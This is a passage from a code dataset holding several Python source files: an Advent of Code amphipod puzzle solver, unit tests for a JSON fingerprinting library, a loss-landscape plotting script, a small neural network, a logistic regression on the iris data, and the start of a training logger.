\"#############\"]\n\n\n\n\nplanB = [\n \"#############\",\n \"#...........#\",\n \"###C#C#A#B###\",\n \"###D#C#B#A###\",\n \"###D#B#A#C###\",\n \"###D#D#B#A###\",\n \"#############\"]\n\nplantBt = [\n \"#############\",\n \"#AA.....B.BD#\",\n \"###B#.#.#.###\",\n \"###D#C#.#.###\",\n \"###D#B#C#C###\",\n \"###A#D#C#A###\",\n \"#############\"]\n\n\n\nplan = planB\n\n\n\ndef path_weight(G,path, weight):\n \n multigraph = G.is_multigraph()\n cost = 0\n\n for node, nbr in nx.utils.pairwise(path):\n if multigraph:\n cost += min([v[weight] for v in G[node][nbr].values()])\n else:\n cost += G[node][nbr][weight]\n return cost\n\n\nclass Bagg:\n\n e = {\"A\":1, \"B\":10, \"C\":100, \"D\":1000}\n home = {\"A\":3, \"B\":5, \"C\":7, \"D\":9}\n\n def __lt__(self, other):\n\n if self.t < other.t:\n return self.t=2: # check all levels\n if (debug):\n print(\"we are deeper than the corridor, check if we are good\")\n \n X = sorted(list(filter(lambda x:x is not self and x.t==self.t and x.x==self.home[self.t], otherbagg)), key=lambda b:b.y)\n l = len(plan)-4\n if (debug):\n print(\"bagg in home for\",self,\"of type\",self.t,\" are :\",X)\n \n # if all items in the list are home, and stacked starting from the bottom of the possible burrow, we are good\n if X!=[]:\n bcnt=0\n #print (range(l,0,-1))\n GOGG=[str(x.x)+\",\"+str(x.y) for x in X]\n for ll in range(len(plan)-2,0,-1):\n if debug:\n print (\"checking position\",str(self.home[self.t])+\",\"+str(ll),\"in\",GOGG)\n \n if str(self.home[self.t])+\",\"+str(ll) in GOGG:\n if debug:\n print (\"Found a lower bagg - good\")\n bcnt+=1\n else:\n break\n \n if bcnt==len(X) and len(X)!=0:\n #print (\"bagg\",self,\"is at home due to\",GOGG)\n return None\n \n \n \n if debug:\n print(\"done checking if we are at home or not (we were not at home)\")\n \n # list of _potential_ moves\n P = set(G.nodes())\n\n X = list(filter(lambda x:x is not self, otherbagg))\n \n for i in X:\n P.remove(str(i.x)+\",\"+str(i.y))\n\n if debug:\n print(P)\n\n # this is the list of all unoccupied spaces in the graph\n # filter it for what we actually are able to do\n\n\n # something here seems to be borked\n # don't move to a burrow if the burrow contains a bagg of another kind\n # that bagg has to move outside first\n # we are not allowed to move to a burrow if there is a bagg of another type in it\n # fix this for part 2\n for i in [3,5,7,9]:\n if i == self.home[self.t]:\n NOT = list(filter(lambda vx: vx.x==i and vx.y>2 and vx.t != self.t, otherbagg))\n\n if debug:\n print(self,\"check if have to move out >\",NOT,\"< from\",P,len(NOT))\n \n for vt in NOT:\n\n P.discard(str(vt.x)+\",2\")\n P.discard(str(vt.x)+\",3\")\n P.discard(str(vt.x)+\",4\")\n P.discard(str(vt.x)+\",5\")\n \n if debug:\n print(\"occ\",vt,P)\n\n if debug:\n print(\"P after home bopp removed\",P)\n\n \n # move to the lowest block in a burrow if we are allowed to move to a burrow\n \n for i in [3,5,7,9]:\n if str(i)+\",3\" in P:\n P.discard(str(i)+\",2\")\n if len(plan)>5:\n if str(i)+\",4\" in P:\n P.discard(str(i)+\",2\")\n P.discard(str(i)+\",3\")\n if str(i)+\",5\" in P:\n P.discard(str(i)+\",2\")\n P.discard(str(i)+\",3\")\n P.discard(str(i)+\",4\")\n\n # don't move to a burrow if we are not supposed to be in that burrow\n for i in self.home:\n if i!=self.t:\n P.discard(str(self.home[i])+\",2\")\n P.discard(str(self.home[i])+\",3\")\n P.discard(str(self.home[i])+\",4\")\n P.discard(str(self.home[i])+\",5\")\n \n\n if debug:\n print(\"P after burrow check:\",P)\n \n if debug:\n print(\"wrong homes !=\",self.home[self.t],\"removed\",P)\n \n\n if debug:\n print(\"removed occupied burrows\",P)\n \n\n # do not move in the corridor, if we already are in the corridor\n if self.y==1:\n for i in range(12):\n P.discard(str(i)+\",1\")\n\n if debug:\n print(\"P after corridor check\",P)\n \n # find all possible paths from where we are to unoccupied spaces\n V=[]\n for i in P:\n t = nx.shortest_path(G,str(self.x)+\",\"+str(self.y),i,weight=\"weight\")\n V.append((path_weight(G,t,\"weight\")*self.e[self.t], nx.shortest_path(G,str(self.x)+\",\"+str(self.y),i,weight=\"weight\")))\n\n\n if debug:\n print(\"All possible paths from\",self,\"to\",P)\n print(V)\n # then remove paths that collide with occupied spaces\n\n for i in list(X): # these are the occupied spaces\n for t in range(len(V)-1,-1,-1):\n if str(i.x)+\",\"+str(i.y) in V[t][1] or len(V[t][1])==1:\n V.pop(t)\n\n #print (V)\n # if our home is at the end of a possible path, go for it and nothing else\n homeV=[]\n for x in V:\n if str(self.home[self.t])+\",2\" in x[1] or str(self.home[self.t])+\",3\" in x[1]:\n if debug:\n print(\"going home\", [x])\n homeV.append(x)\n\n if homeV!=[]:\n V=homeV\n\n if len(V)>0:\n if debug: \n print(\"final possible remaining moves\", V)\n # random.shuffle(V)\n V=sorted(V,reverse=True,key=lambda x:x[0])\n return (V)\n else:\n return None\n\n def __repr__(self):\n return \"[\"+self.t+\":\"+str(self.x)+\",\"+str(self.y)+\"]\"\n \nbagg = []\n \nG = nx.Graph()\n\n# corridor\nG.add_edge(\"1,1\",\"2,1\",weight=1)\nG.add_edge(\"2,1\",\"4,1\",weight=2)\nG.add_edge(\"4,1\",\"6,1\",weight=2)\nG.add_edge(\"6,1\",\"8,1\",weight=2)\nG.add_edge(\"8,1\",\"10,1\",weight=2)\nG.add_edge(\"10,1\",\"11,1\",weight=1)\n\n# burrows\n\nG.add_edge(\"2,1\",\"3,2\",weight=2)\nG.add_edge(\"4,1\",\"3,2\",weight=2)\nG.add_edge(\"3,2\",\"3,3\",weight=1)\n\nG.add_edge(\"4,1\",\"5,2\",weight=2)\nG.add_edge(\"6,1\",\"5,2\",weight=2)\nG.add_edge(\"5,2\",\"5,3\",weight=1)\n\nG.add_edge(\"6,1\",\"7,2\",weight=2)\nG.add_edge(\"8,1\",\"7,2\",weight=2)\nG.add_edge(\"7,2\",\"7,3\",weight=1)\n\nG.add_edge(\"8,1\",\"9,2\",weight=2)\nG.add_edge(\"10,1\",\"9,2\",weight=2)\nG.add_edge(\"9,2\",\"9,3\",weight=1)\n\nif(len(plan)==7):\n G.add_edge(\"3,3\",\"3,4\",weight=1)\n G.add_edge(\"3,4\",\"3,5\",weight=1)\n\n G.add_edge(\"5,3\",\"5,4\",weight=1)\n G.add_edge(\"5,4\",\"5,5\",weight=1)\n\n G.add_edge(\"7,3\",\"7,4\",weight=1)\n G.add_edge(\"7,4\",\"7,5\",weight=1)\n\n G.add_edge(\"9,3\",\"9,4\",weight=1)\n G.add_edge(\"9,4\",\"9,5\",weight=1)\n\n\n#nx.draw(G, with_labels=True)\n#plt.savefig(\"maze.png\")\n\nfor y in range(len(plan)):\n s=\"\"\n for x in range(len(plan[0])):\n \n if plan[y][x] in \"ABCD\":\n bagg.append(Bagg(plan[y][x],x,y))\n s+=\".\"\n else:\n s+=plan[y][x]\n plan[y]=s\n \ndef pr(rec, board, bagg, cost):\n\n bs = []\n for y in range(len(board)):\n s=\"\"\n for x in range(len(board[0])):\n for b in bagg:\n if b.x==x and b.y==y:\n s+=b.t\n break\n if len(s)<=x:\n s+=board[y][x]\n\n bs.append(s)\n return bs\n\ndef moveprint(p):\n\n #print (p)\n if p==[]:\n return\n\n for i in range(max(0,len(p)-17),len(p)):\n print (str(i).ljust(len(p[0][0])+1,\" \"),end=\"\")\n print(\"\")\n for i in range(len(p[0])):\n for j in range(max(0,len(p)-17),len(p)):\n print(p[j][i]+\" \",end=\"\")\n print(\"\")\n\n\ndef descend(bagg, G, board, bx, mv, bi, rec=0, cost=0,path=[],themin=sys.maxsize,queue=None):\n\n global debug\n \n #print (\"moving bagg\",i)\n #moveprint(path)\n\n zcount=0\n for thez in bx[bi]:\n zcount+=1\n if (cost+thez[0])themin:\n print(rec,\"cost\",cost,\"themin\",themin)\n return sys.maxsize\n\n\n #pr(rec, board,bagg, cost)\n\n #proppen = \"\".join(pr(rec, board, bagg, cost))\n #if proppen in cache:\n # return cache[proppen]\n \n\n c=0\n for baggi in bagg:\n if baggi.x==baggi.home[baggi.t] and baggi.y>1:\n c+=1\n \n #print(\"home: \",c)\n if c==len(bagg):\n if themin is None or cost < themin:\n print (\"all home\",cost)\n #pr(rec, board, bagg, cost)\n moveprint(path)\n themin = cost\n if queue is not None:\n #print(\"sending result to queue\")\n queue.put(themin)\n return cost\n\n if rec==0:\n m = mp.Manager()\n queue=m.Queue()\n \n if rec==0:\n pool = mp.Pool(max(len(bagg),mp.cpu_count()))\n print(\"Created pool with\",max(len(bagg),mp.cpu_count()),\"threads\")\n \n mv=themin \n koko=0\n bokbok=[]\n thebagg = dict()\n\n for bi in range(len(bagg)):\n thebagg[bi] = bagg[bi].findmoves(bagg, G, plan)\n bokbok.append(thebagg[bi])\n if thebagg[bi]:\n koko+=len(thebagg[bi])\n if rec==0:\n res = pool.apply_async(descend, (bagg, G, board,thebagg,mv,bi),{\"rec\":rec, \"cost\":cost,\"path\":path,\"themin\":themin,\"queue\":queue})\n results.append(res)\n else:\n #if rec>0 and queue is None:\n # print(rec,\":\",bagg[bi],\"moves\",thebagg[bi])\n mv = descend(bagg, G, board,thebagg,mv,bi,rec, cost,path,themin,queue)\n \n if koko==0:\n #print(\"deadlock\",cost)\n #if cost==660:\n # #debug=True\n # moveprint(path)\n # #print(bokbok)\n if queue is not None:\n #print(\"sending result to queue\")\n queue.put(sys.maxsize)\n return sys.maxsize\n\n if rec==0:\n mscnt=0\n while True:\n try:\n v = [res.get(timeout=1) for res in results]\n print (v)\n return (min(v))\n except:\n try:\n while True:\n w = queue.get(False)\n if w != sys.maxsize:\n print (\"got potential minvalue\",w,\"old minvalue is\",mv)\n else:\n mscnt+=1\n if mscnt%1000==0:\n print(mscnt,\"dead ends, minvalue=\",mv)\n if w < mv:\n print (\"new minvalue\",w)\n mv = w\n break\n except: # queue empty exception\n pass\n\n #cache[proppen]=mv \n return mv \n \nthemin=movebagg(bagg,G,plan,rec=0)\n \nprint(\"Answer 1:\",themin) \n\n","sub_path":"2021/23/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":14294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"171570189","text":"import json\nimport os\nimport unittest\n\nfrom json_fingerprint import create\nfrom json_fingerprint._exceptions import FingerprintJSONLoadError\n\nTESTS_DIR = os.path.dirname(__file__)\nTESTDATA_DIR = os.path.join(TESTS_DIR, 'testdata')\n\n\nclass TestCreate(unittest.TestCase):\n def test_jfpv1_json_load_error(self):\n \"\"\"Test json fingerprint raw json string load error.\n\n Verify that:\n - FingerprintJSONLoadError is properly raised with malformed json input string\"\"\"\n with self.assertRaises(FingerprintJSONLoadError):\n create('{\"foo\": bar}', hash_function='sha256', version=1)\n\n def test_jfpv1_sha256_output_format(self):\n \"\"\"Test jfpv1 output format.\n\n Verify that:\n - Complete jfpv1-sha256 output fingerprint is properly formatted\"\"\"\n fp = create(input='{\"foo\": \"bar\"}', hash_function='sha256', version=1)\n self.assertRegex(fp, '^jfpv1\\\\$sha256\\\\$[0-9a-f]{64}$')\n\n def test_jfpv1_sha384_output_format(self):\n \"\"\"Test jfpv1 output format.\n\n Verify that:\n - Complete jfpv1-sha256 output fingerprint is properly formatted\"\"\"\n fp = create(input='{\"foo\": \"bar\"}', hash_function='sha384', version=1)\n self.assertRegex(fp, '^jfpv1\\\\$sha384\\\\$[0-9a-f]{96}$')\n\n def test_jfpv1_sha512_output_format(self):\n \"\"\"Test jfpv1 output format.\n\n Verify that:\n - Complete jfpv1-sha256 output fingerprint is properly formatted\"\"\"\n fp = create(input='{\"foo\": \"bar\"}', hash_function='sha512', version=1)\n self.assertRegex(fp, '^jfpv1\\\\$sha512\\\\$[0-9a-f]{128}$')\n\n def test_jfpv1_sha256_mixed_order(self):\n \"\"\"Test jfpv1 sha256 mixed order fingerprint match.\n\n Verify that:\n - The fingerprints of test objects 1 and 2 match despite same data being ordered differently\n - The fingerprints also match against a known valid fingerprint\"\"\"\n with open(os.path.join(TESTDATA_DIR, 'jfpv1_test_obj_1.json'), 'r') as file:\n self.test_obj_1 = file.read()\n file.close()\n\n with open(os.path.join(TESTDATA_DIR, 'jfpv1_test_obj_2.json'), 'r') as file:\n self.test_obj_2 = file.read()\n file.close()\n fp_1 = create(self.test_obj_1, hash_function='sha256', version=1)\n fp_2 = create(self.test_obj_2, hash_function='sha256', version=1)\n self.assertEqual(fp_1, fp_2)\n self.assertEqual(fp_1, 'jfpv1$sha256$b182c755347a6884fd11f1194cbe0961f548e5ac62be78a56c48c3c05eb56650')\n\n def test_jfpv1_sha256_structural_distinction_1(self):\n \"\"\"Test jfpv1 json flattener's structural value distinction.\n\n Verify that:\n - Identical value content in identical depths, but in different structures,\n don't produce identical outputs\"\"\"\n obj_in_1 = [\n 1,\n [1, [2, 2]],\n [2, [2, 2]],\n ]\n fp_1 = create(input=json.dumps(obj_in_1), hash_function='sha256', version=1)\n\n obj_in_2 = [\n 1,\n [1, 2, [2, 2, 2, 2]],\n ]\n fp_2 = create(input=json.dumps(obj_in_2), hash_function='sha256', version=1)\n\n self.assertNotEqual(fp_1, fp_2)\n\n def test_jfpv1_sha256_structural_distinction_2(self):\n \"\"\"Test jfpv1 json flattener's structural value distinction.\n\n Verify that:\n - Values in identical paths/structures but different sibling values don't get matched\"\"\"\n obj_in_1 = [\n [1, ['x', 'x']],\n [2, ['y', 'y']],\n ]\n fp_1 = create(input=json.dumps(obj_in_1), hash_function='sha256', version=1)\n\n obj_in_2 = [\n [1, ['x', 'y']],\n [2, ['x', 'y']],\n ]\n fp_2 = create(input=json.dumps(obj_in_2), hash_function='sha256', version=1)\n\n self.assertNotEqual(fp_1, fp_2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"json_fingerprint/tests/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123592977","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom scipy.interpolate import griddata\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import colors\n\nNH = 100\nLR = 0.001\nEP = 2000\nSEED = 1\nDIM = 201\n\nNICE_NAMES_DICT = {\n \"xy_no_symm\": \"Symmetry-free XY Model\",\n \"xy_hard_symm\": \"Symmetry-enforced XY Model\",\n \"tfim_no_symm\": \"TFIM\",\n}\n\nNUM_PARS = 6\n\nSEED = 1\ntorch.manual_seed(SEED)\n\nparams = {\n \"text.usetex\": True,\n \"font.family\": \"serif\",\n \"legend.fontsize\": 10,\n \"axes.labelsize\": 10,\n \"xtick.labelsize\": 10,\n \"ytick.labelsize\": 10,\n \"lines.linewidth\": 1,\n \"patch.edgecolor\": \"black\",\n}\n\ndef loss_plot_heatmap(physics_model, symm_type, N, max_change):\n\n model_name = \"{0}_{1}\".format(physics_model, symm_type)\n results_folder = \"results/{0}_results\".format(model_name)\n study_name = \"N{0}_nh{1}_lr{2}_ep{3}\".format(N, NH, LR, EP)\n\n # Define the intervals which alpha, beta will take\n alpha_min, alpha_max = -max_change, max_change\n beta_min, beta_max = -max_change, max_change\n\n alpha_vals = np.linspace(alpha_min, alpha_max, DIM)\n beta_vals = np.linspace(beta_min, beta_max, DIM)\n grid_alphas, grid_betas = np.meshgrid(alpha_vals, beta_vals)\n\n landscape_file = \"loss_landscape_range{0}_dim{1}_{2}_{3}_seed{4}.txt\".format(\n max_change, DIM, model_name, study_name, SEED\n )\n loss_data = np.loadtxt(\n \"{0}/{1}/{2}\".format(results_folder, study_name, landscape_file)\n )\n\n # Now make plots of parameters trajectory\n # First retrieve final values of params\n max_ep = 2000 # how long training occurs for\n opt_params = []\n for par_num in range(NUM_PARS):\n param_filename = \"param{0}_{1}_epoch2000_N{2}_nh{3}_lr{4}_ep{5}.txt\".format(\n par_num, model_name, N, NH, LR, EP\n )\n param = np.loadtxt(\n \"{0}/{1}/param_vals/{2}\".format(results_folder, study_name, param_filename)\n )\n opt_params.append(param)\n\n # Get recorded values from data files\n period = 5 # how often parameter info recorded\n epochs = range(0, max_ep + 1, period)\n\n epochs_dict = {} # store epoch: listof params\n for epoch in epochs:\n params = []\n for par_num in range(NUM_PARS):\n param_filename = \"param{0}_{1}_epoch{2}_N{3}_nh{4}_lr{5}_ep{6}.txt\".format(\n par_num, model_name, epoch, N, NH, LR, EP\n )\n param = np.loadtxt(\n \"{0}/{1}/param_vals/{2}\".format(\n results_folder, study_name, param_filename\n )\n )\n param -= opt_params[par_num] # centre at optimum\n params.append(param)\n epochs_dict[epoch] = params\n\n # Get deltas and etas using same seed\n deltas = []\n etas = []\n for par_num in range(NUM_PARS):\n delta = np.loadtxt(\n \"{0}/{1}/delta{2}_{3}_N{4}_nh{5}_lr{6}_ep{7}.txt\".format(\n results_folder, study_name, par_num, model_name, N, NH, LR, EP\n )\n )\n eta = np.loadtxt(\n \"{0}/{1}/eta{2}_{3}_N{4}_nh{5}_lr{6}_ep{7}.txt\".format(\n results_folder, study_name, par_num, model_name, N, NH, LR, EP\n )\n )\n deltas.append(delta)\n etas.append(eta)\n\n # Now compute alphas and betas for every epoch\n alphas = []\n betas = []\n for epoch in epochs:\n alpha = 0\n beta = 0\n for par_num in range(NUM_PARS):\n # Need to expand dims to use tensor dot\n curr_params = epochs_dict[epoch][par_num]\n delta = deltas[par_num]\n eta = etas[par_num]\n if len(curr_params.shape) == 1:\n curr_params = np.expand_dims(curr_params, axis=0)\n delta = np.expand_dims(delta, axis=0)\n eta = np.expand_dims(eta, axis=0)\n alpha += np.tensordot(curr_params, delta)\n beta += np.tensordot(curr_params, eta)\n alphas.append(alpha)\n betas.append(beta)\n\n # NOTE: This stuff is for interpolating, which isn't good in this case\n # n_points = 10000\n # alpha_indices = np.random.choice(DIM, n_points)\n # beta_indices = np.random.choice(DIM, n_points)\n\n # alpha_points = alpha_vals[alpha_indices]\n # beta_points = beta_vals[beta_indices]\n # loss_points = loss_data[alpha_indices, beta_indices]\n # points_tuple = (alpha_points, beta_points)\n # grid_tuple = (grid_alphas, grid_betas)\n\n # interp_vals = griddata(\n # points_tuple, loss_points, grid_tuple, method=\"cubic\"\n # )\n\n fig, ax = plt.subplots()\n # ax.contourf(grid_alphas, grid_betas, interp_vals)\n norm = colors.Normalize(vmin=loss_data.min(), vmax=loss_data.max())\n contour = ax.imshow(\n loss_data,\n cmap=\"YlGn\",\n norm=norm,\n extent=[-max_change, max_change, -max_change, max_change],\n )\n ax.set_xlim(-max_change, max_change)\n ax.set_ylim(-max_change, max_change)\n fig.colorbar(contour, ax=ax)\n ax.plot(alphas, betas, color=\"C0\", linestyle=\"-\")\n ax.scatter(alphas[::40], betas[::40], color=\"C3\")\n ax.set_title(r\"{0} loss landscape projection\".format(NICE_NAMES_DICT[model_name]))\n ax.set_xlabel(r\"$\\alpha$\")\n ax.set_ylabel(r\"$\\beta$\")\n # ax.set_zlabel(r\"Loss\")\n\n image_name = (\n \"plot_loss_landscape_heatmap_range{0}_dim{1}_{2}_{3}_seed{4}.pdf\".format(\n max_change, DIM, model_name, study_name, SEED\n )\n )\n plt.savefig(\"{0}/{1}/{2}\".format(results_folder, study_name, image_name))\n","sub_path":"landscape_visualization/landscape_visualization_plot_heatmap.py","file_name":"landscape_visualization_plot_heatmap.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"187058827","text":"import data\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom dat import sigmoid,der_sigmoid,train_data,test_data\nfrom scipy.optimize import minimize\nfrom IPython.display import clear_output\nclass Network:\n\t\n\tdef __init__(self,l,size=0):\n\t\tself.m=l.shape[0]\n\t\tself.input=l.shape[1]\n\t\t#theta initialisations\n\t\tself.theta1=np.random.randn(self.input,15)\n\t\tself.theta2=np.random.randn(16,15)\n\t\tself.theta3=np.random.randn(16,10)\n\t\t#activation \n\t\tself.activate1=l\n\t\tself.activate4=np.random.randn(self.m,10)\n\t\tself.activate2=np.random.randn(self.m,16)\n\t\tself.activate3=np.random.randn(self.m,16)\n\t\t#partial derivative wrt to theta\n\t\tself.del4=np.random.randn(self.m,10)\n\t\tself.del2=np.random.randn(self.m,16)\n\t\tself.del3=np.random.randn(self.m,16)\n\t\t\n\tdef pr(self):\n\t\treturn self.activate2.shape,self.activate3.shape,self.activate4.shape\n\t\n\tdef feedforward(self,l):\n\t\ta=l\n\t\ta=a.dot(self.theta1)\n\t\tb=np.ones((a.shape[0],16))\n\t\tb[:,1:]=sigmoid(a)\n\t\ta=b\n\t\tself.activate2=a\n\t\ta=a.dot(self.theta2)\n\t\tb=np.ones((a.shape[0],16))\n\t\tb[:,1:]=sigmoid(a)\n\t\ta=b\n\t\tself.activate3=a\n\t\ta=a.dot(self.theta3)\n\t\ta=sigmoid(a)\n\t\tself.activate4=a\n\t\treturn a\n\t\n\tdef backprop(self,y):\n\t\tself.del4=self.activate4-y\n\t\tself.del3=(self.del4.dot((self.theta3).T))*(self.activate3*(1-self.activate3))\n\t\tself.del2=(self.del3[:,1:].dot(self.theta2.T))*(self.activate2*(1-self.activate2))\n\t\treturn self.del4,self.del3,self.del2\n\t\n\tdef cost(self,lam,y):\n\t\tJ=-y*(np.log(sigmoid(self.activate4)))-(1-y)*(np.log(1-sigmoid(self.activate4)))\n\t\tJ=np.sum(J)\n\t\tJ+=(lam/2)*(np.sum(self.theta1*self.theta1)+np.sum(self.theta3[:,1:]*self.theta3[:,1:])+np.sum(self.theta2[:,1:]*self.theta2[:,1:]))\n\t\tJ/=self.m\n\t\treturn J\n\t\t\n\tdef der(self,lam):\n\t\tder4=0\n\t\tder4+= self.activate3.T.dot(self.del4)\n\t\tder3=self.activate2.T.dot(self.del3[:,1:])\n\t\tder2=self.activate1.T.dot(self.del2[:,1:])\n\t\t\n\t\tder4/=self.m\n\t\tder3/=self.m\n\t\tder2/=self.m\n\t\t\n\t\tder4[:,1:]+=lam*(self.theta3[:,1:])\n\t\tgrad4=np.reshape(der4,(der4.shape[0]*der4.shape[1],1))\n\t\t\n\t\tder3[:,1:]+=lam*(self.theta2[:,1:])\n\t\tgrad3=np.reshape(der3,(der3.shape[0]*der3.shape[1],1))\n\t\t\n\t\tder2[:,1:]+=lam*(self.theta1[:,1:])\n\t\tgrad2=np.reshape(der2,(der2.shape[0]*der2.shape[1],1))\n\t\t\n\t\tgrad=np.concatenate((grad2,grad3,grad4))\n\t\tgrad=np.reshape(grad,(grad.shape[0]*grad.shape[1],1))\n\t\treturn der2,der3,der4\n\t\n\tdef grad_descent(self,alpha,it):\n\t\tx,y= train_data()\n\t\ta=self.feedforward(x)\n\t\tb=self.backprop(y)\n\t\tg1,g2,g3=self.der(0.1)\n\t\tfor j in xrange(it):\n\t\t\tprint(\"iteration: \"+str(j)+\"|training:\")\n\t\t\tplt.imshow(self.theta2,cmap=plt.get_cmap('gray'))\n\t\t\tplt.show()\n\t\t\tt1=self.theta1-(alpha*g1)\n\t\t\tt2=self.theta2-(alpha*g2)\n\t\t\tt3=self.theta3-(alpha*g3)\n\t\t\tself.theta1=t1\n\t\t\tself.theta2=t2\n\t\t\tself.theta3=t3\n\t\t\ta=self.feedforward(x)\n\t\t\tb=self.backprop(y)\n\t\t\tg1,g2,g3=self.der(0.1)\n\tdef grad(self,epsilon,lam,y):\n\t\t\n\t\tfor i in xrange(self.theta1.shape[0]):\n\t\t\tfor j in xrange(self.theta1.shape[1]):\n\t\t\t\tt1=self.theta1\n\t\t\t\tself.theta1[i][j]+=epsilon\n\t\t\t\tc_plus=self.cost(lam,y)\n\t\t\t\tself.theta1=t1\n\t\t\t\tself.theta1[i][j]-=epsilon\n\t\t\t\tc_minus=self.cost(lam,y)\n\t\t\t\t\n\n\n\t\t\t\t\n\tdef output(self):\n\t\tx=test_data()\n\t\ty=self.feedforward(x)\n\t\ty_label=np.argmax(y,axis=1)\n\t\treturn y_label","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"157641128","text":"#Author:liulu\n#Date:2020.09.06\n#参考代码:https://github.com/Dod-o/Statistical-Learning-Method_Code\n# https://github.com/fengdu78/lihang-code\n'''\n数据集:iris\n数据集简介:iris数据集大小为150*5,前四列为特征,最后一列为标签;一个有三种标签,每个标签对应50个样本;\n在此程序中,为了画图方便,只用了前两个特征sepal length 和 sepal width, 并且只用了前100个样本,也就是只\n用了两类标签,实现二分类。\n\n此程序对权值的更新采用了梯度下降法。\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\n\n# 加载数据\ndef loadData():\n print(\"start to load data\")\n iris = load_iris()\n df = pd.DataFrame(iris.data, columns=iris.feature_names)\n df['label'] = iris.target\n # 由于原来的列标签后面都带有单位cm,所以这里重新定义列标签\n df.columns = ['sepal lengrh', 'sepal width', 'petal length', 'petal width', 'label']\n # pd.DataFrame类型转换为numpy数组,并切片出前两列特征和和最后一列类标签\n data = np.array(df.iloc[:100, [0, 1, -1]])\n print(\"loading completed\")\n return data[:,:-1],data[:,-1]\n\n\nclass LogisticRegression:\n #初始化权值,学习率和最大迭代次数\n def __init__(self,learning_rate = 0.01, max_iter = 200):\n self.w = np.zeros((3,1),dtype=np.float) #如果要用iris数据集的全部特征,将这里的3改为5即可\n self.learning_rate = learning_rate\n self.max_iter = max_iter\n\n #定义sigmoid函数\n def sigmoid(self,x):\n return 1 / (1 + np.exp(-x))\n\n #训练,梯度下降\n def train(self, train_data, train_label):\n print(\"start to train\")\n #因为输入的train_label是个1维数组,无法进行转置,所以将其扩充为2维\n train_label = np.array([train_label]).T\n for iter in range(self.max_iter):\n #用for循环一行一行的实现梯度下降\n for i in range(len(train_data)):\n x = np.array([train_data[i]])\n y = train_label[i]\n wx = np.dot(x, self.w)\n self.w += self.learning_rate*(x*y - (np.exp(wx) * x) / ( 1 + np.exp(wx))).T\n\n #直接用矩阵实现\n #计算 w*x\n # wx = np.dot(train_data, self.w)\n # #计算梯度\n # gradient = np.dot(train_data.T, (self.sigmoid(wx) - train_label))\n # #更新权值\n # self.w -= self.learning_rate*gradient\n print(\"training completed\")\n print(\"w is {}\".format(self.w))\n\n #预测\n def predict(self, x):\n wx = np.dot(x, self.w)\n result = self.sigmoid(wx)\n if result > 0.5:\n return 1\n else:\n return 0\n\n #测试,给出正确率\n def test(self, test_data, test_label):\n print(\"start to test\")\n error_count = 0\n for i in range(len(test_data)):\n x = test_data[i]\n y = test_label[i]\n if y != self.predict(x):\n error_count += 1\n acc = 1 - error_count/len(test_data)\n print(\"testing completed\")\n print(\"Accrucy is {:.3%}\".format(acc))\n\nif __name__ == \"__main__\":\n #加载数据\n X, Y = loadData()\n #因为将b合并到了w中,所以相应的要扩充输入向量,w[-1]为b\n X_data = np.hstack([X, np.ones((len(X),1))])\n #划分训练集和测试集\n train_data, test_data, train_label, test_label = train_test_split(X_data, Y, test_size=0.3)\n clf = LogisticRegression()\n clf.train(train_data, train_label)\n clf.test(test_data, test_label)\n\n #画图\n plt.scatter(X[:50, 0], X[:50, 1], label='0')\n plt.scatter(X[50:, 0], X[50:, 1], label='1')\n plt.legend()\n x_points = x_ponits = np.arange(4, 8)\n y_points = -(clf.w[0]*x_ponits + clf.w[2])/clf.w[1]\n plt.plot(x_ponits, y_points)\n plt.show()\n\n","sub_path":"Logistic回归/logistic回归-梯度下降法.py","file_name":"logistic回归-梯度下降法.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"292099358","text":"import errno\nimport json\nimport os\nfrom datetime import datetime\nfrom statistics import mean\n\nfrom matplotlib import pyplot as plt\n\nclass Logger(object):\n def __init__(self, params, game, show=False):\n self.save_dir, self.numpy_dumps_dir, self.pickled_dir = self.save_parameters(params, game)\n self.is_remote = not show\n self.training_V_loss = []\n self.training_pi_loss = []\n\n def plot_online_return(self, online_scores):\n plt.figure()\n plt.plot(online_scores)\n plt.grid = True\n plt.title(\"Return over policy improvement episodes\")\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Return\")\n plt.savefig(self.save_dir + \"/plots/return.png\")\n if not self.is_remote:\n plt.show()\n plt.close()\n\n def plot_loss(self, episode, ep_V_loss, ep_pi_loss):\n plt.figure()\n plt.plot(ep_V_loss, label=\"V_loss\")\n plt.plot(ep_pi_loss, label=\"pi_loss\")\n plt.grid = True\n plt.title(\"Training loss\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Loss\")\n plt.yscale(\"log\")\n plt.legend()\n plt.savefig(self.save_dir + \"/plots//train_\" + str(episode) + \".png\")\n if not self.is_remote:\n plt.show()\n plt.close()\n\n ep_pi_loss = mean(ep_pi_loss)\n ep_V_loss = mean(ep_V_loss)\n\n self.training_V_loss.append(ep_V_loss)\n self.training_pi_loss.append(ep_pi_loss)\n\n print(\"--------------------------\")\n print(\"Episode\", episode)\n print(\"pi_loss:\", ep_pi_loss)\n print(\"V_loss:\", ep_V_loss)\n print(\"--------------------------\")\n\n def plot_evaluation_mean_and_variance(self, avgs, stds, indexes=None):\n \"\"\"Plot the mean and variance with a whiskers plot\n @type avgs: list\n @type stds: list\n @type indexes: list\n \"\"\"\n if not indexes:\n indexes = [10 * i for i in range(len(avgs))]\n\n plt.figure()\n plt.errorbar(indexes, avgs, stds, linestyle='None', marker='^', capsize=3)\n 